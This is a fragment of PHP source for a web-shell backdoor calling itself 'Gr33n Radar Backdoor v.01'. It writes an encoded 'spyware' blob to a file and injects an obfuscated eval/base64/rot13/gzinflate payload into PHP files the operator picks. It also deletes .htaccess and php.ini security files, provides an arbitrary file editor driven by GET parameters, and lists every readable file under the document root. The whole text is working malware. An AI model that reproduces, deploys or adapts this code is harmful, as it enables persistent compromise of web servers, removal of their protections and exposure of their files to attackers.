VkSFmaHxNByxLz/SSyb7hTKiJ8CrD6y/H6NCSJDJ2OF5ZAjHk+MRW8Mq6EQ7yAmPliyt+pXh6nlWzAMib92XogHcJWutVvzX4rvn9yofC QmUrNgNmh2y+nWI6Pe76hixukNkfhN7y2zXPeU9QEKfIq0rQ8Cgl2CzmaoE8yYyQOdeyembT47cF8vzRTfm0sUymZXMQlht3eoogCdDsU RWCUp0uDz9l+PQ1ye1hGceC+8Qcm/baHY5ZwRj6VrX4N5RluA+7qmT75DG04EBRFY+p+1gtOG/m5FsTT2fJj8KXiBGL6nBzR6o0GF90DzB tztMvUI9Iao94ncWcswn4m09WFc0nA+VICU7v2JZ0CFkAJ/i1zGpbGlDHN3RYX3DksF0fGSWZyfUqdl9ukgOaCDx+EojBMhsoFH6Rivwhp V2KPyygRmyE+3TRsAXq34iDpu5hoDFj7oi84WXoA283HQrW2EAyJZKh7if3kFSKdyCFNSpVy0zPmnswYVJdpKsdeDX421MvwvBApKN++x9 2L+C3dZFeDFMyqGj57MmL4mb87bYU7o6hkjJfjqS/4PEiL/gk3hPpIKDpq25hr6cqsSqA0D49Xhq/GxGn6ybvpyUSrl4KuCMl66Uslhd17 DrtVJc1rO5EOikfsd1bnbvqMSfDcPvStKgZTzqWl66MvjHJS6JG2i7evna7j0rddhL4dodXYOfgzCr0ukOkDaKsjDbRLnAtdDjRBjuVO0S 9wsYoZCzaLo+C3ugkm5074sZRcJjkPFMoLDjUKwkxRHVbx8tWLLvH3eTaHxrBeKrb9OW9+MeAjYOww4fo9RJ+lpx4RzTmYcud1Ai5DAxKy IG0ZErhTLRT1awRjdqbjy5qtF9DWYUgEKiSKDZfVgPyn9XWnFLSZC041RGdceoK5sAnDq8JEtsPWzYWsaQxNdUBQN88NWOB2cMnl14mcXj fVg6biQWmNUBE6LFs2wYDgo5AyLVKFuCXYbrGFK1g1djde7MNpI49mgcvYsQaHSq4rPy1tUrSFBnGxcX4091F1wK9waUGIEV+VHIViTuhw Lei60RbsBFbOnmnDzbXV+T1vywxK/FM1MgcS7WQseNOYaa4InCUubnU7O0BPD3CR9XYi1LGYqyOUl6wnPtiPE9asGe5JRhxwQr7ttS0e79 yt3iadsuEgDSswEyoGnpe4elHpUNo6c3/lzWf50e16mLRk59/mYtYR9Mr7Qn1yriOag4KWEIsn8VUO9arLAIZtRcVMaruJoGfD+aKAAJsp 0BvVBliyW/hp57HIfn3Gmdxi77btN9Xh6pyzKEeJqfJwRptwXhkFstdXdSUkuyQAOx8Pe6WSzlfMLz5kZ/ROxHBUUB0Wy8vMeawbMCsGC3 LHSmS067NwUotKU0u0e0EsFb/QvZH+TBlljlBp0vrHDLvojHPQ7jVrBDtPi2LqYKdPMbQA6AirL944lAp2qpi8Kaf0rANAxBlTfSzyaYuv gf6dl00/aet+xu1LfwkSOjmjIpxErUPIKjLk1OP3lUE3dR9ltIafs5FqIKoc/itQI1PvZ8tLAEICjWgv+Z7Yfgtff7/v4yXihMWcq54/Dv pknZ/X3m2S0QbaiivsuKt69anNHu4aH+TNNWqvmq2rSIZUzglqGhzW5Hb1vUmyOyOGqUrzILsnKsqDJV5X5nJxhQabVyeB5UAQNpg8rgmT h7W+SpKe+ZLeGlYTwMabq5CvtwcOgAk7SrTERL0zvmjSSx4niPeI81Zsai9vJYFkcctl0uugvLA5WFBrhzo7wuBCUFssm9QTGgr0h9W9pg gabuHEEbQxN1fVwm/iwke/LfzgGGCNWyFy5HyIpQ2rejDvT/wcUH5Io1Zc34ZdkltZLyGs6t/LYVcTfEojLkAEN7S0qOUj0kdv0GjKHt5S g322t2J7VjRKEHI55ymMV7IiB3zvOzjwUuBLReBc5JO83PqSbbXGzaqv3uTcymIoeL5uBsZX6A+yLf3e6fO8QMWDtuQNB5E84xqZ+VWv4o ls2ulFrb9mSxZOqwF6q5HKGAsAxHgiZF7ToC+bBpT6C7X//g+4/vsP'))))); ?> "; $write = fopen("system_sql.php", 'a'); fwrite($write, "$spyware_code"); fclose($write); print '<script>alert("spyware installed!")</script>'; header( "refresh:1;url=$myname?backdoor=activation"); } /*---------------*/ /*| File to Spy |*/ /*---------------*/ if (isset($_GET['filespy'])) { print '<center><br><a href="?backdoor=activation"> <button style="background-color:#00ffff">~Home</button></a> <br><div style="width:300px; height:50px; border:1px solid lime;"> <font color="lime"> Enter the name of the file to spy on [allowed only PHP files]</font></div><br>'; echo' <center><form action="'.$SERVER[PHP_SELF].'" method="POST"> <input type="text" style="background-color:#00ffff" name="filenspy" value="filename.php"> <input type="submit" value="select" style="background-color:#00ffff"> </form>'; } if (isset($_POST['filenspy'])) { $filenspy = $_POST['filenspy']; print "$filenspy now is under control!<br>"; /*---------------*/ /*| including |*/ /*---------------*/ $inc_me = "eval(str_rot13(gzinflate(str_rot13(base64_decode('LRXFDqxL9ng63bPDJbMqHAqn 0M0Eamq+fi4vWgL3XI77RQ/3P1t/xOs9lMs/40MsBPa/bJmSbPknH5oqv/+9/P3VBLRCxMJEub oldoeT8K7V/F5s/EYX6Lbjnwq9/0+cZRgWFU2OKe27HtxGik+gLPgLMVkqOZpUAv91sY74RIzA X+cue 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'))))); "; /*--------------------------*/ /*| Writing victime File |*/ /*--------------------------*/ rename("$filenspy", "$filenspy.txt"); $target_xy = "3"; $statszx = file("$filenspy.txt", FILE_IGNORE_NEW_LINES); $offsetbc = array_search($target_xy,$statszx) +1; array_splice($statszx, $offsetbc, 0, "$inc_me"); file_put_contents("$filenspy.txt", join("\n", $statszx)); $format_erasex = str_replace(".txt", "", "$filenspy.txt"); rename("$filenspy.txt", "$format_erasex"); } /*---------------------------------------------------------------------------------------------------------*/ /* END */ /*---------------------------------------------------------------------------------------------------------*/ //__________________________________________________________________________________ //| |######################| | //| |# Backdoor Safe_Mode #| | //| |######################| | //|_________________________________________________________________________________| if (isset($_GET['sm_editor'])) { print '<center><div style="width:400px; height:100px; border:1px solid red;">'; print "<font color='red'><h2>Welcome To Safe_Mode</h2> <small>Gr33n Radar Backdoor v.01</small></font><br></div>"; print "<div style='float: center; text-align: center;'> <a href='?sm_editor=on'><button style='background-color: aqua;color:#ff0000;'>~Back</button></a> </div></center><br>"; //deleting security files if (false!==file(".htaccess")) unlink(".htaccess"); else echo ""; if (false!==file("php.ini")) unlink("php.ini"); else echo ""; //For run File editor <-- backdoor_name.php?sm_editor=on --> //#Editor echo'<center><font color="red">Edit File:</font> <form action="'.$SERVER[PHP_SELF].'" method="GET" style="text-align: center;"> <input type="hidden" name="sm_editor" value="activation"> <input type="text" style="background-color: aqua;color:#ff0000;" name="file_to_edit" value="filename_to_edit.php"><br> <input type="submit" style="background-color: aqua;color:#ff0000;" value="execute"></form><br>'; if(isset($_GET['file_to_edit'])) { $file_to_edit = $_GET['file_to_edit']; ?> <form action="<?php basename($_SERVER['PHP_SELF']) ?>" method="GET" style="text-align: center;"> <input type="hidden" name="sm_editor" value="activation"> <font color="red"> <input type="text" style="background-color: aqua;color:#ff0000;" name="file_to_edit2" value="<? echo $file_to_edit; ?>"><br> <textarea name="code" id="editor" cols="30" rows="10" style="width: 90%; height: 70vh; background-color: aqua;color:#ff0000;"><?php echo htmlentities(file_get_contents($file_to_edit)); ?> </textarea> </font> <br> <input type="submit" style="background-color: aqua;color:#ff0000;" value="Edit" name="Edit"> </form> <? } //editing File if(!empty($_GET['code']&&$_GET['file_to_edit2'])) { $codej = $_GET['code']; $file_to_edit2 = $_GET['file_to_edit2']; $myfilej = fopen($file_to_edit2, "w") or die("<font color='red'>--Unable to open file--</font>"); fwrite($myfilej, $codej); fclose($myfilej); echo "<font color='red'>--File Edited--</font></center>"; } }; //For run dir explorer <-- backdoor_name.php?sm_exp=on --> if (isset($_GET['sm_exp'])) { //File explorer echo '<center><div style="width:150px; height:50px; border:1px solid red;"> <font color="red">'; echo "~ [Current Directory]<br>"; echo basename(__DIR__); echo '</font></div><br>'; echo '<center><div style="width:150px; height:20px; border:1px solid red;"> <font color="red">~ [Files]</font> </div>'; $startfolderj = './'; $filesss=array(); foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderj, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filew => $infoz ) { if( $infoz->isFile() && $infoz->isReadable() ) { $filesss[]=array('filename'=>$infoz->getFilename(),'path'=>realpath( $infoz->getPathname() ) ); } } echo '<pre>',print_r($filesss,true),'</pre>'; };; //For run root explorer <-- backdoor_name.php?sm_root_exp=on --> //root Explorer if (isset($_GET['sm_root_exp'])) { $startfolderp = $_SERVER['DOCUMENT_ROOT']; $filesp=array(); foreach( new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $startfolderp, RecursiveDirectoryIterator::KEY_AS_PATHNAME ), RecursiveIteratorIterator::CHILD_FIRST ) as $filep => $infop ) { if( $infop->isFile() && $infop->isReadable() ){ $filesp[]=array('filename'=>$infop->getFilename(),'path'=>realpath( $infop->getPathname() ) ); } } echo '<center><div style="width:150px; height:20px; border:1px solid red;"> <font color="red">~ [All Files]</font></div><br>'; echo '<pre>',print_r($filesp,true),'</center></pre>'; };;; //__________________________________________________________________________________ //| |##########################| | //| |# Backdoor Safe_Mode End #| | //| |##########################| | //|_________________________________________________________________________________| ?> </center> </body> </html>